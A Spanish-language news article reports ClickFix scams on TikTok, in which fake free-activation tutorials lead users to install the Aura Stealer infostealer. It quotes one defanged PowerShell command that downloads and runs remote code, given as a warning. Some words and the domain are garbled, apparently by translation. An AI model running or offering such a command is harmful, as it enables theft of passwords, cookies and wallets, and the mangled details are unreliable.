Descubren un nuevo tipo de robo de datos en TikTok, donde circulan vídeosDeos que supuestamente enseñan métodos para descargar versiones gratuitas de programas como Windows, Netflix o Photoshop.
Detrás de estos falsos tutoriales se esconde una estafa informática destinada a robar información personal y financiera de los usuarios, según ha revelado el experto en ciberseguridad Xavier Mertens del SANS Internet Storm Center (ISC).
Las instrucciones alegres y aparentemente inofensivas indican a los usuarios que ejecuten comandos en su computadora.
LEER TAMBIÉN
Photoshop es una de las aplicaciones que promete instalar malware gratis Foto:iStock
Sin embargo, En lugar de activar funciones «premium», los comandos instalan malware. Este método, denominado ClickFix, fue reportado anteriormente por el portal de ciberseguridad “Trend Micro” y ahora TikTok se ha expandido debido a la alta presencia de usuarios jóvenes interesados en trucos técnicos y descargas gratuitas.
Mertens advirtió que TikTok se ha convertido en un canal atractivo para los ciberdelincuentes debido a la dinámica de confianza entre CrLos espectadores y usuarios facilitan la rápida difusión de vídeos engañosos. «Es una forma muy eficaz de ingeniería social. La gente confía en los creadores y no tiene idea de que una simple orden podría poner en peligro su seguridad». comentó el analista.
Uno de los ejemplos detectados muestra un vídeo que promete la activación gratuita de Photoshop y pide a los usuarios que ejecuten el siguiente comando en PowerShell:
- iex (irm slmgr[.]Ganar/Photoshop).
LEER TAMBIÉN
El robo de datos también está impulsado por la promesa de Netflix gratis Foto:iStock
Aunque parezca una instrucción técnica inofensiva, en realidad conecta la computadora a un servidor remoto que descarga archivos maliciosos. Según el portal Bleeping Computer, estos archivos son una variante del malware Aura Stealer.capaz de extraer contraseñas, cookies de autenticación, datos bancarios y carteras de criptomonedas almacenadas en los navegadores.
Los expertos recomiendan que las personas que siguieron las instrucciones de estos videos cambien inmediatamente todas las contraseñas, como las de correo electrónico, redes sociales y cuentas bancarias. Además, ejecute un análisis completo con un antivirus actualizado y evite ejecutar comandos o descargas que no provengan de fuentes oficiales.
